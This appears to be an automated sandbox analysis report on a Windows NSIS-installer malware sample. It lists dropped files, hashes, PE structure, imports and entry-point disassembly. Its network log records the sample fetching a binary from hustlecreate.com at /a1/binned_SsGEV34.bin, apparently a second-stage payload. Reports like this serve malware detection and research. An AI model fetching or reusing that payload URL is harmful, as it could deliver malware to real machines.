                                                                          Reputation:low
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):19056
                                                                          Entropy (8bit):6.442411564417779
                                                                          Encrypted:false
                                                                          SSDEEP:384:8WhLWql40uIrRDTveaVEc2gK/uPHRN7xpJ/AlGseCvy:rfl40uqDTveaVCMxv/xj4y
                                                                          MD5:E3F74999CDB00FCAAA6A40A97B8F199B
                                                                          SHA1:F3A2C8DF8E98F7DCB49CBE5C4A717A6087A656D2
                                                                          SHA-256:6929BC473DF404FCED714F345479216B66B72ACF116061DF1CDD8ACAEE961333
                                                                          SHA-512:3BE3EEAB3304EFEB9594FA516B61528587CFA8453AB7B4AF991137E3A1D7E23270DA600FC341EEF703932CCFF53571ACF3CD00AEEAE47347CC36EE69B71DB37C
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtf, Detection: malicious, Browse
                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                          • Filename: pago.exe, Detection: malicious, Browse
                                                                          Reputation:low
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):264
                                                                          Entropy (8bit):6.7753015109610715
                                                                          Encrypted:false
                                                                          SSDEEP:6:6v/lhPysLQNJ4BgpBly/Gj6e3ba4Dzz8fKtVp:6v/7rQb4BAlyU6mDzzoK9
                                                                          MD5:39182B562FCB2BAD93D58516462708A8
                                                                          SHA1:F9A88E1F1313BD05CDB1E962DE8170CCCFDA9151
                                                                          SHA-256:DEF4215BBA93FAED6FCF7E4687EF89AB828DB10E69171A5E14908F091302C59F
                                                                          SHA-512:ECEC5D0E389293DB2977C7A7DCE8E4FAC10A3ADA7466DBA9CE4FE9712F5725D84E67A5E0ED9BE5091D68BD817186D6CFC89CA650CC5323FB8C038A14BAD3896D
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):243
                                                                          Entropy (8bit):6.6375398452197
                                                                          Encrypted:false
                                                                          SSDEEP:6:6v/lhPysEFaTw0eY/5b5sap5kGC125kiUP2afunr2W7Vtljp:6v/7kgoY/7shGC1DHP24u6KtlN
                                                                          MD5:433D25AD6818DB00083CD062A16D3479
                                                                          SHA1:D4210D893E965912EA7BD45C80D359FECAB54A98
                                                                          SHA-256:3D06E8FA89BA4FA9D9BCC260F38C72D1A104FE3E6F8923A3EE553563832027CB
                                                                          SHA-512:E5095FE100F811D73196F01C732AA09E2359E5796DF38A0B3E25599F3F99CCD2ED181070463285655521199B7B084A7848E6629CB5CE0AE07FCBC17D5953FA4C
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):12288
                                                                          Entropy (8bit):5.814115788739565
                                                                          Encrypted:false
                                                                          SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                          MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                          SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                          SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                          SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: Metadefender, Detection: 3%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.generic.ml.22865.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.generic.ml.22865.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exe, Detection: malicious, Browse
                                                                          • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                                                          • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                                                          • Filename: PO64747835 PDF.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.Exploit.Rtf.Obfuscated.64.25308.rtf, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.generic.ml.10062.exe, Detection: malicious, Browse
                                                                          • Filename: ALuh1ODGq3.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.14840.exe, Detection: malicious, Browse
                                                                          • Filename: SecuriteInfo.com.W32.AIDetect.malware2.14840.exe, Detection: malicious, Browse
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):633
                                                                          Entropy (8bit):7.5766983812463735
                                                                          Encrypted:false
                                                                          SSDEEP:12:6v/7x8QVQCJI+uIidxp+pY5f5Cqxnnu13gYdndacj/Ya+SvGpaNusvrdVJ:PxOI5I0P+2Zu13gIdR/Yla8svrfJ
                                                                          MD5:0CBA7EB7455B0DB79456C5911F12B75E
                                                                          SHA1:DAACA4FE36E4F61016D473A0A1CD4C980906872B
                                                                          SHA-256:50F4DB972320FF30D4FD98B61F58D956678F38FD1D11CA5109E5559D02A986BE
                                                                          SHA-512:D6976DC90DD3B01A7AAFDF67C5360CC75020971473F8689CA73A9931FB36FF4CC6994034664E11B4FF31146767F5B9DB898104BE814A1611C8A02260C66E11D8
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Category:dropped
                                                                          Size (bytes):265238
                                                                          Entropy (8bit):6.697651009316531
                                                                          Encrypted:false
                                                                          SSDEEP:6144:FR+xXYSIvF68OZGbpYByPT7lyvIco9KX25G5PGDu6WL1g:DMIvk8OvByPHly5425GDum
                                                                          MD5:1DCEAF980C4D83AE2A13BD0F047E1BD7
                                                                          SHA1:7D97E79EFB047361A8C2A8AC0A26B37127C3C7AC
                                                                          SHA-256:0C340FB13ACAAAE759215AF9C970DC6C167418534C421EB626643E20FD0AC832
                                                                          SHA-512:8FDBBBCAAC2B3188819E7F8E3ADE82E01723F27C151EDD50F4AE090339C680CE685540BCA76018BC5494CEBF5001A5FCF97C07D7FC47479BF11CEB38A3CE9FE4
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):190624
                                                                          Entropy (8bit):6.481480370859183
                                                                          Encrypted:false
                                                                          SSDEEP:3072:o/qsfTS04VccXuMeXEVmd/AuRV9DKRSeilOA1Fafxc7Kwhbzi+iOh:oysrSDcHbNd7+xmVbP
                                                                          MD5:059BE7432DFAD92F4EA0A2E5941C52A7
                                                                          SHA1:1C1B989D6B9D0FA0808FCA8893ADDC8CD76602D9
                                                                          SHA-256:8E184A514D8716B59B24892CB425752E6D7837735C1E9F1996D66E70BFEC033B
                                                                          SHA-512:EA79397D73840AEA9E9C3AC55F2E4FFA9A10828C2BFD993AB116CC08412E690C3DE10617AC516B944DEA48D7BFCEC201404C9CF0E54A5594A247F5F202F59F57
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File Type:C source, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):15782
                                                                          Entropy (8bit):5.207431068394915
                                                                          Encrypted:false
                                                                          SSDEEP:192:zu0gnPI2Z1Fylkd3cd/e5QJvWUnumPw2QJt+UnumPwhJhbjSjSHXMXzhFwqOzj5w:zYIOyaKl+uybeiHtHai
                                                                          MD5:1B00C31FF20D27F07B299063908311E0
                                                                          SHA1:1976E6DD68DD0D64508C91A6DFAB8E75F8AAF6CD
                                                                          SHA-256:EC872BB1DDC330D3F19F68D033B0706E1B78D4A91A58998674B67EAD58BEA729
                                                                          SHA-512:38B29DB2CDA85380F63C86EAAA5D7DE6657EA4C6A0B074D184F6F3218467C865B3D0B56C2844547897139F5C324792C0D3CB5AE1FB4B593AB6F8889A7C88BB30
                                                                          Malicious:false
                                                                          Preview:/*.** 2013-06-12.**.** The author disclaims copyright to this source code. In place of.** a legal notice, here is a blessing:.**.** May you do good and not evil..** May you find forgiveness for yourself and forgive others..** May you share freely, never taking more than you give..**.*************************************************************************.**.** A shim that sits between the SQLite virtual table interface and.** runtimes with garbage collector based memory management..*/.#include "sqlite3ext.h".SQLITE_EXTENSION_INIT1.#include <assert.h>.#include <string.h>..#ifndef SQLITE_OMIT_VIRTUALTABLE../* Forward references */.typedef struct vtshim_aux vtshim_aux;.typedef struct vtshim_vtab vtshim_vtab;.typedef struct vtshim_cursor vtshim_cursor;.../* The vtshim_aux argument is the auxiliary parameter that is passed.** into sqlite3_create_module_v2()..*/.struct vtshim_aux {. void *pChildAux; /* pAux for child virtual tables */. void (*xChildDestroy)(void*);
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.518620994648534
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          File size:929272
                                                                          MD5:7f369d460c84146944c3c12bf83901af
                                                                          SHA1:29ea3441429d555ddfd0fd8d5973aab0f9ea2663
                                                                          SHA256:a5e095edbdf743431c5e866c01c3a592fc5a7ddf6bfb617d72f81181743adf3a
                                                                          SHA512:5183cb1c7173fcf8f5d30c9a5842a2e895d50d8a742e7097b7d8862d7e0e6be4a94e166bc4b7175717a18e93c194d1259cb30ed7b649b518f0d9736f66e9f3fc
                                                                          SSDEEP:12288:YbKP7r9r/+ppppppppppppppppppppppppppppp0Y/e4hZJgtQ9STVQ40QPKBut6:YbK1M/e1Q4VQ4muENar+Wav5BK3c
                                                                          TLSH:7C15E0C0E94495A1ED1DAB716A36CD3546237DBDA874A81D25DE3E2B3FFB2D31026023
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                                                                          Icon Hash:c4c4c4c8ccd4d0c4
                                                                          Entrypoint:0x40352d
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                          Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                                          Instruction
                                                                          push ebp
                                                                          mov ebp, esp
                                                                          sub esp, 000003F4h
                                                                          push ebx
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          pop edi
                                                                          xor ebx, ebx
                                                                          push 00008001h
                                                                          mov dword ptr [ebp-14h], ebx
                                                                          mov dword ptr [ebp-04h], 0040A2E0h
                                                                          mov dword ptr [ebp-10h], ebx
                                                                          call dword ptr [004080CCh]
                                                                          mov esi, dword ptr [004080D0h]
                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                          push eax
                                                                          mov dword ptr [ebp-0000012Ch], ebx
                                                                          mov dword ptr [ebp-2Ch], ebx
                                                                          mov dword ptr [ebp-28h], ebx
                                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                                          call esi
                                                                          test eax, eax
                                                                          jne 00007FB89C8884BAh
                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                                          push eax
                                                                          call esi
                                                                          mov ax, word ptr [ebp-0000012Ch]
                                                                          mov ecx, dword ptr [ebp-00000112h]
                                                                          sub ax, 00000053h
                                                                          add ecx, FFFFFFD0h
                                                                          neg ax
                                                                          sbb eax, eax
                                                                          mov byte ptr [ebp-26h], 00000004h
                                                                          not eax
                                                                          and eax, ecx
                                                                          mov word ptr [ebp-2Ch], ax
                                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                          jnc 00007FB89C88848Ah
                                                                          and word ptr [ebp-00000132h], 0000h
                                                                          mov eax, dword ptr [ebp-00000134h]
                                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                                          mov dword ptr [00434FB8h], eax
                                                                          xor eax, eax
                                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                                          movzx eax, ax
                                                                          or eax, ecx
                                                                          xor ecx, ecx
                                                                          mov ch, byte ptr [ebp-2Ch]
                                                                          movzx ecx, cx
                                                                          shl eax, 10h
                                                                          or eax, ecx
                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x354c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6897 | 0x6a00 | False | 0.666126179245 | data | 6.45839821493 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x14a6 | 0x1600 | False | 0.439275568182 | data | 5.02410928126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x2b018 | 0x600 | False | 0.521484375 | data | 4.15458210409 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x36000 | 0x22000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x58000 | 0x354c8 | 0x35600 | False | 0.212867754684 | data | 4.44760586334 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x58538 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x68d60 | 0x94a8 | data | English | United States
RT_ICON | 0x72208 | 0x67e8 | data | English | United States
RT_ICON | 0x789f0 | 0x5488 | data | English | United States
RT_ICON | 0x7de78 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432 | English | United States
RT_ICON | 0x820a0 | 0x35e0 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x85680 | 0x25a8 | data | English | United States
RT_ICON | 0x87c28 | 0x10a8 | data | English | United States
RT_ICON | 0x88cd0 | 0xea8 | data | English | United States
RT_ICON | 0x89b78 | 0x988 | data | English | United States
RT_ICON | 0x8a500 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x8ada8 | 0x6c8 | data | English | United States
RT_ICON | 0x8b470 | 0x668 | data | English | United States
RT_ICON | 0x8bad8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x8c040 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x8c4a8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294965391, next used block 7403512 | English | United States
RT_ICON | 0x8c790 | 0x1e8 | data | English | United States
RT_ICON | 0x8c978 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x8caa0 | 0x100 | data | English | United States
RT_DIALOG | 0x8cba0 | 0x11c | data | English | United States
RT_DIALOG | 0x8ccc0 | 0xc4 | data | English | United States
RT_DIALOG | 0x8cd88 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x8cde8 | 0x102 | data | English | United States
RT_VERSION | 0x8cef0 | 0x298 | data | English | United States
RT_MANIFEST | 0x8d188 | 0x33e | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
ADVAPI32.dll | RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll | SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
Description | Data
LegalCopyright | SELVFORKL
FileVersion | 14.32.29
CompanyName | xanthopicr
LegalTrademarks | UDSLUTTETGABSTE
Comments | Svolvdioxidemiss200
ProductName | frstedirektrenta
FileDescription | SKESSONGLANDSKUM
Translation | 0x0409 0x04b0
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                          May 27, 2022 09:53:20.924523115 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.924535990 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.924890041 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.925085068 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925127983 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925137997 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925146103 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925266027 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925477982 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.925683022 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925695896 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925698996 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925700903 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925704002 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925707102 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925802946 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.925955057 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925970078 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925975084 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925980091 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925987959 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.925992966 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926001072 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926012039 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926178932 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926202059 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926223040 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926235914 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926350117 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926361084 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926372051 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926378965 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926388979 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926426888 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926430941 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926438093 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926525116 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926536083 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926623106 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926635027 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926650047 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926671982 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926815033 CEST49764443192.168.11.2069.49.244.14
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 27, 2022 09:53:19.752115011 CEST | 50349 | 53 | 192.168.11.20 | 1.1.1.1
May 27, 2022 09:53:19.932111025 CEST | 53 | 50349 | 1.1.1.1 | 192.168.11.20

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 27, 2022 09:53:19.752115011 CEST | 192.168.11.20 | 1.1.1.1 | 0xad3c | Standard query (0) | hustlecreate.com | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 27, 2022 09:53:19.932111025 CEST | 1.1.1.1 | 192.168.11.20 | 0xad3c | No error (0) | hustlecreate.com | | 69.49.244.14 | A (IP address) | IN (0x0001)

• hustlecreate.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49764 | 69.49.244.14 | 443 | C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe

Timestamp | kBytes transferred | Direction | Data
2022-05-27 07:53:20 UTC | 0 | OUT | GET /a1/binned_SsGEV34.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: hustlecreate.com
Cache-Control: no-cache
2022-05-27 07:53:20 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Fri, 27 May 2022 07:53:20 GMT
Server: Apache
Last-Modified: Thu, 26 May 2022 20:46:49 GMT
Accept-Ranges: bytes
Content-Length: 175680
Connection: close
Content-Type: application/octet-stream
                                                                          Data Ascii: -:[9C|Lz[=f]S,3Zf/q6L";] LV^Jd5#od&n[cD`mZF?T'LI]abAwrPdg1),_]IR`|zAeI&`(\fYeSjv\BIq6vY}xeyk3e&~ni!ty+d|/5 q]



                                                                          Target ID:2
                                                                          Start time:09:52:49
                                                                          Start date:27/05/2022
                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe"
                                                                          Imagebase:0x400000
                                                                          File size:929272 bytes
